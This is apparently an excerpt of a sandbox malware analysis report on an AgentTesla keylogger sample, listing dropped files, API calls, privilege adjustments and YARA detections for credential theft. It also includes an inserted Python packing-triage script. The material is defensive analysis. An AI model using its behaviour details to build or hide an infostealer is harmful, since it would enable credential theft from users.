Source: unjuridically.exe, 00000006.00000002.1756799947.000000000107E000.00000040.00000001.01000000.00000004.sdmp | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer [memstr_96679ed3-1]
Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: C:\Users\user\Desktop\XoRPyi5s1i.exe | Code function: 1_2_00133742 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow
Source: C:\Users\user\Desktop\XoRPyi5s1i.exe | Code function: 1_2_001A00AF NtdllDialogWndProc_W
Source: C:\Users\user\Desktop\XoRPyi5s1i.exe | Code function: 1_2_001A0133 GetSystemMetrics,MoveWindow,SendMessageW,InvalidateRect,SendMessageW,ShowWindow,NtdllDialogWndProc_W
Source: C:\Users\user\Desktop\XoRPyi5s1i.exe | Code function: 1_2_001A044C NtdllDialogWndProc_W
Source: C:\Users\user\Desktop\XoRPyi5s1i.exe | Code function: 1_2_0019E9AF NtdllDialogWndProc_W,CallWindowProcW
Source: C:\Users\user\Desktop\XoRPyi5s1i.exe | Code function: 1_2_0014AAFC NtdllDialogWndProc_W
Source: C:\Users\user\Desktop\XoRPyi5s1i.exe | Code function: 1_2_0014AB4F NtdllDialogWndProc_W
Source: C:\Users\user\Desktop\XoRPyi5s1i.exe | Code function: 1_2_0019EC7C NtdllDialogWndProc_W
Source: C:\Users\user\Desktop\XoRPyi5s1i.exe | Code function: 1_2_0019ECD4 ReleaseCapture,SetWindowTextW,SendMessageW,NtdllDialogWndProc_W
Source: C:\Users\user\Desktop\XoRPyi5s1i.exe | Code function: 1_2_0019EEEB PostMessageW,GetFocus,GetDlgCtrlID,_memset,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W
Source: C:\Users\user\Desktop\XoRPyi5s1i.exe | Code function: 1_2_0014B11F NtdllDialogWndProc_W,74B1C8D0,NtdllDialogWndProc_W
Source: C:\Users\user\Desktop\XoRPyi5s1i.exe | Code function: 1_2_0019F1D7 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W
Source: C:\Users\user\Desktop\XoRPyi5s1i.exe | Code function: 1_2_0019F2D0 SendMessageW,NtdllDialogWndProc_W
Source: C:\Users\user\Desktop\XoRPyi5s1i.exe | Code function: 1_2_0019F351 DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W
Source: C:\Users\user\Desktop\XoRPyi5s1i.exe | Code function: 1_2_0014B385 GetParent,NtdllDialogWndProc_W
Source: C:\Users\user\Desktop\XoRPyi5s1i.exe | Code function: 1_2_0014B55D NtdllDialogWndProc_W,GetClientRect,GetCursorPos,ScreenToClient
Source: C:\Users\user\Desktop\XoRPyi5s1i.exe | Code function: 1_2_0019F5AB NtdllDialogWndProc_W
Source: C:\Users\user\Desktop\XoRPyi5s1i.exe | Code function: 1_2_0019F5DA NtdllDialogWndProc_W
Source: C:\Users\user\Desktop\XoRPyi5s1i.exe | Code function: 1_2_0019F609 NtdllDialogWndProc_W
Source: C:\Users\user\Desktop\XoRPyi5s1i.exe | Code function: 1_2_0019F654 NtdllDialogWndProc_W
Source: C:\Users\user\Desktop\XoRPyi5s1i.exe | Code function: 1_2_0019F689 ClientToScreen,NtdllDialogWndProc_W
Source: C:\Users\user\Desktop\XoRPyi5s1i.exe | Code function: 1_2_0014B715 NtdllDialogWndProc_W
Source: C:\Users\user\Desktop\XoRPyi5s1i.exe | Code function: 1_2_0019F7C3 GetWindowLongW,NtdllDialogWndProc_W
Source: C:\Users\user\Desktop\XoRPyi5s1i.exe | Code function: 1_2_0019F7FF NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW
Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_00FD3742 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow
Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_01040133 GetSystemMetrics,MoveWindow,SendMessageW,InvalidateRect,SendMessageW,ShowWindow,NtdllDialogWndProc_W
Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_010400AF NtdllDialogWndProc_W
Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_0104044C NtdllDialogWndProc_W
Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_0103E9AF NtdllDialogWndProc_W,CallWindowProcW
Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_00FEAAFC NtdllDialogWndProc_W
Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_00FEAB4F NtdllDialogWndProc_W
Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_0103EC7C NtdllDialogWndProc_W
Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_0103ECD4 ReleaseCapture,SetWindowTextW,SendMessageW,NtdllDialogWndProc_W
Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_0103EEEB PostMessageW,GetFocus,GetDlgCtrlID,_memset,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W
Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_0103F1D7 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W
Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_00FEB11F NtdllDialogWndProc_W,74B1C8D0,NtdllDialogWndProc_W
Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_0103F351 DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W
Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_00FEB385 GetParent,NtdllDialogWndProc_W
Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_0103F2D0 SendMessageW,NtdllDialogWndProc_W
Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_0103F5AB NtdllDialogWndProc_W
Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_0103F5DA NtdllDialogWndProc_W
Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_00FEB55D NtdllDialogWndProc_W,GetClientRect,GetCursorPos,ScreenToClient
Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_0103F7C3 GetWindowLongW,NtdllDialogWndProc_W
Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_0103F7FF NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW
Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_0103F609 NtdllDialogWndProc_W
Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_0103F654 NtdllDialogWndProc_W
Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_0103F689 ClientToScreen,NtdllDialogWndProc_W
Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_00FEB715 NtdllDialogWndProc_W
Source: C:\Users\user\Desktop\XoRPyi5s1i.exe | Code function: 1_2_00176606: CreateFileW,DeviceIoControl,CloseHandle
Source: C:\Users\user\Desktop\XoRPyi5s1i.exe | Code function: 1_2_0016ACC5 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,741A5590,CreateProcessAsUserW,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle
Source: C:\Users\user\Desktop\XoRPyi5s1i.exe | Code function: 1_2_001779D3 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_010179D3 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
Source: C:\Users\user\Desktop\XoRPyi5s1i.exe | Code function: 1_2_0015B043
Source: C:\Users\user\Desktop\XoRPyi5s1i.exe | Code function: 1_2_00143B70
Source: C:\Users\user\Desktop\XoRPyi5s1i.exe | Code function: 1_2_0016410F
Source: C:\Users\user\Desktop\XoRPyi5s1i.exe | Code function: 1_2_001502A4
Source: C:\Users\user\Desktop\XoRPyi5s1i.exe | Code function: 1_2_0016038E
Source: C:\Users\user\Desktop\XoRPyi5s1i.exe | Code function: 1_2_0013E3B0
Source: C:\Users\user\Desktop\XoRPyi5s1i.exe | Code function: 1_2_0016467F
Source: C:\Users\user\Desktop\XoRPyi5s1i.exe | Code function: 1_2_001506D9
Source: C:\Users\user\Desktop\XoRPyi5s1i.exe | Code function: 1_2_0019AACE
Source: C:\Users\user\Desktop\XoRPyi5s1i.exe | Code function: 1_2_00164BEF
Source: C:\Users\user\Desktop\XoRPyi5s1i.exe | Code function: 1_2_0015CCC1
Source: C:\Users\user\Desktop\XoRPyi5s1i.exe | Code function: 1_2_00136F07
Source: C:\Users\user\Desktop\XoRPyi5s1i.exe | Code function: 1_2_0013AF50
Source: C:\Users\user\Desktop\XoRPyi5s1i.exe | Code function: 1_2_0014B11F
Source: C:\Users\user\Desktop\XoRPyi5s1i.exe | Code function: 1_2_001931BC
Source: C:\Users\user\Desktop\XoRPyi5s1i.exe | Code function: 1_2_0015D1B9
Source: C:\Users\user\Desktop\XoRPyi5s1i.exe | Code function: 1_2_00143200
Source: C:\Users\user\Desktop\XoRPyi5s1i.exe | Code function: 1_2_0015123A
Source: C:\Users\user\Desktop\XoRPyi5s1i.exe | Code function: 1_2_0016724D
Source: C:\Users\user\Desktop\XoRPyi5s1i.exe | Code function: 1_2_001713CA
Source: C:\Users\user\Desktop\XoRPyi5s1i.exe | Code function: 1_2_001393F0
Source: C:\Users\user\Desktop\XoRPyi5s1i.exe | Code function: 1_2_0014F563
Source: C:\Users\user\Desktop\XoRPyi5s1i.exe | Code function: 1_2_001396C0
Source: C:\Users\user\Desktop\XoRPyi5s1i.exe | Code function: 1_2_0017B6CC
Source: C:\Users\user\Desktop\XoRPyi5s1i.exe | Code function: 1_2_001377B0
Source: C:\Users\user\Desktop\XoRPyi5s1i.exe | Code function: 1_2_0019F7FF
Source: C:\Users\user\Desktop\XoRPyi5s1i.exe | Code function: 1_2_001679C9
Source: C:\Users\user\Desktop\XoRPyi5s1i.exe | Code function: 1_2_0014FA57
Source: C:\Users\user\Desktop\XoRPyi5s1i.exe | Code function: 1_2_00139B60
Source: C:\Users\user\Desktop\XoRPyi5s1i.exe | Code function: 1_2_00137D19
Source: C:\Users\user\Desktop\XoRPyi5s1i.exe | Code function: 1_2_0014FE6F
Source: C:\Users\user\Desktop\XoRPyi5s1i.exe | Code function: 1_2_00159ED0
Source: C:\Users\user\Desktop\XoRPyi5s1i.exe | Code function: 1_2_00137FA3
Source: C:\Users\user\Desktop\XoRPyi5s1i.exe | Code function: 1_2_0177E580
Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_00FFB043
Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_0100410F
Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_00FF02A4
Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_0100038E
Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_00FDE3B0
Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_00FF06D9
Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_0100467F
Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_01004BEF
Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_0103AACE
Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_00FFCCC1
Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_00FDAF50
Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_00FD6F07
Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_010331BC
Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_00FFD1B9
Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_00FEB11F
Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_00FF123A
Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_010113CA
Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_00FE3200
Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_00FD93F0
Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_0100724D
Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_00FEF563
Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_00FD96C0
Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_0103F7FF
Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_00FD77B0
Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_0101B6CC
Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_010079C9
Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_00FEFA57
Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_00FE3B70
Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_00FD9B60
Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_00FD7D19
Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_00FF9ED0
Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_00FEFE6F
Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_00FD7FA3
Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_015AE5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_00AD4A88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_00AD3E70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_00ADAE57
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_00AD41B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_05D0AD78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_05D0C857
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_05D0C858
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_05D866C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_05D83138
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_05D8B309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_05D85270
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_05D87E50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_05D8E478
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_05D87770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_05D80040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_05D859AB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_05D8003F
Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 6_2_018C8660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_01724A88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_01723E70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_0172AE58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_017241B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_0172AE57
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_069B7E50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_069B5670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_069BC270
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_069B2BC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_069BB318
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_069B7770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_069BE478
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_069B5DC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_069B0040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_069B003F
Source: C:\Users\user\Desktop\XoRPyi5s1i.exe | Code function: String function: 0015F8A0 appears 35 times
Source: C:\Users\user\Desktop\XoRPyi5s1i.exe | Code function: String function: 00156AC0 appears 42 times
Source: C:\Users\user\Desktop\XoRPyi5s1i.exe | Code function: String function: 0014EC2F appears 68 times
Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: String function: 00FEEC2F appears 68 times
Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: String function: 00FFF8A0 appears 35 times
Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: String function: 00FF6AC0 appears 42 times
Source: XoRPyi5s1i.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: 2.2.unjuridically.exe.f60000.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 2.2.unjuridically.exe.f60000.0.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 6.2.unjuridically.exe.1190000.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 6.2.unjuridically.exe.1190000.1.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 2.2.unjuridically.exe.f60000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 2.2.unjuridically.exe.f60000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 3.2.RegSvcs.exe.620000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 3.2.RegSvcs.exe.620000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 6.2.unjuridically.exe.1190000.1.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 6.2.unjuridically.exe.1190000.1.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 00000002.00000002.1635227729.0000000000F60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 00000002.00000002.1635227729.0000000000F60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 00000006.00000002.1757155715.0000000001190000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 00000006.00000002.1757155715.0000000001190000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: XoRPyi5s1i.exe | Static PE information: Section: UPX1 ZLIB complexity 0.9887281760772659
Source: unjuridically.exe.1.dr | Static PE information: Section: UPX1 ZLIB complexity 0.9887281760772659
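The two "Section: UPX1 ZLIB complexity 0.9887..." rows are the report's static packing evidence: a section whose bytes barely compress is already compressed or encrypted, which is exactly what a UPX1 body looks like. The script below is an added example, not code from the Joe Sandbox report, showing how to reproduce that kind of measurement on a sample: it walks the PE section table with struct (no pefile dependency) and reports, per section, the ratio of zlib-compressed size to raw size. Reading "ZLIB complexity" as that ratio is an assumption, the 0.9 threshold and the UPX section-name heuristic are this example's own, and the PE it analyses is constructed in memory (an empty UPX0, a pseudo-random UPX1 and a trivially compressible .rsrc) so it runs offline.

```python
"""Per-section packing triage, modeled on the report's "UPX1 ZLIB complexity" rows.

Added example; not code from the Joe Sandbox report. ASSUMPTIONS: "ZLIB
complexity" is taken to mean zlib-compressed size / raw size (near 1.0 means the
bytes are already compressed or encrypted, as in a UPX1 body); the 0.9 threshold
and the UPX section-name heuristic are this example's own; the PE is CONSTRUCTED
in memory so nothing needs to be downloaded.
"""
import random
import struct
import zlib


def pe_sections(data: bytes):
    """Yield (name, raw_bytes) for each section of a PE image (minimal parser)."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    num_sections = struct.unpack_from("<H", data, coff + 2)[0]
    opt_size = struct.unpack_from("<H", data, coff + 16)[0]
    first = coff + 20 + opt_size            # section table follows the optional header
    for i in range(num_sections):
        off = first + 40 * i                # IMAGE_SECTION_HEADER is 40 bytes
        name = data[off:off + 8].rstrip(b"\0").decode("ascii", "replace")
        raw_size, raw_ptr = struct.unpack_from("<II", data, off + 16)
        yield name, data[raw_ptr:raw_ptr + raw_size]


def zlib_complexity(blob: bytes) -> float:
    """Compressed-size ratio: ~0 for zero-filled data, ~1.0 for random or packed data."""
    return len(zlib.compress(blob, 9)) / len(blob) if blob else 0.0


def triage(data: bytes, threshold: float = 0.9):
    """Return [(section, complexity, flagged)]; flagged means the section looks packed."""
    result = []
    for name, blob in pe_sections(data):
        c = zlib_complexity(blob)
        result.append((name, round(c, 4), c >= threshold or name.startswith("UPX")))
    return result


def build_sample_pe() -> bytes:
    """CONSTRUCT a minimal PE32: empty UPX0, pseudo-random UPX1, compressible .rsrc.
    Only the header fields the parser above reads carry meaningful values."""
    rng = random.Random(1587765)   # seeded with the report's analysis ID, for reproducibility only
    sections = [("UPX0", b""),
                ("UPX1", bytes(rng.getrandbits(8) for _ in range(4096))),
                (".rsrc", b"A" * 512)]
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                   # e_lfanew -> PE signature
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                      # PE32 optional-header magic
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, len(opt), 0x0102)
    headers_len = 0x40 + 4 + len(coff) + len(opt) + 40 * len(sections)
    raw_base = (headers_len + 0x1FF) & ~0x1FF                  # 512-byte file alignment
    table, payload = b"", b""
    for i, (name, blob) in enumerate(sections):
        raw_ptr = raw_base + len(payload) if blob else 0
        table += struct.pack("<8sIIIIIIHHI", name.encode(), len(blob), 0x1000 * (i + 1),
                             len(blob), raw_ptr, 0, 0, 0, 0, 0x60000020)
        payload += blob + b"\0" * (-len(blob) % 0x200)
    image = bytes(dos) + b"PE\0\0" + coff + bytes(opt) + table
    return image + b"\0" * (raw_base - len(image)) + payload


if __name__ == "__main__":
    for name, c, flagged in triage(build_sample_pe()):
        print(f"{name:8s} complexity={c:.4f} {'PACKED?' if flagged else 'ok'}")
```

On a real sample, pass the file bytes to triage() instead of build_sample_pe(); a section scoring near 1.0 tells you the static strings and YARA hits you see in this report will only appear after unpacking or in a memory dump, which is why the report's rule matches above are against .unpack and .sdmp sources rather than the file on disk.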
Source: XoRPyi5s1i.exe, 00000001.00000002.1614611285.0000000002500000.00000004.00001000.00020000.00000000.sdmp, XoRPyi5s1i.exe, 00000001.00000003.1603896323.0000000001890000.00000004.00000020.00020000.00000000.sdmp, XoRPyi5s1i.exe, 00000001.00000003.1603564614.0000000001871000.00000004.00000020.00020000.00000000.sdmp, unjuridically.exe, 00000002.00000003.1618441264.000000000169E000.00000004.00000020.00020000.00000000.sdmp, unjuridically.exe, 00000002.00000003.1618948208.00000000016BD000.00000004.00000020.00020000.00000000.sdmp, unjuridically.exe, 00000006.00000003.1745191511.0000000001938000.00000004.00000020.00020000.00000000.sdmp, unjuridically.exe, 00000006.00000003.1745285883.0000000001957000.00000004.00000020.00020000.00000000.sdmp, acrorrheuma.1.dr | Binary or memory string: 5@B.SlN;M
Source: classification engine | Classification label: mal100.troj.spyw.expl.evad.winEXE@10/10@2/2
Source: C:\Users\user\Desktop\XoRPyi5s1i.exe | Code function: 1_2_0017CE7A GetLastError,FormatMessageW
Source: C:\Users\user\Desktop\XoRPyi5s1i.exe | Code function: 1_2_0016AB84 AdjustTokenPrivileges,CloseHandle
Source: C:\Users\user\Desktop\XoRPyi5s1i.exe | Code function: 1_2_0016B134 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_0100AB84 AdjustTokenPrivileges,CloseHandle
Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_0100B134 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
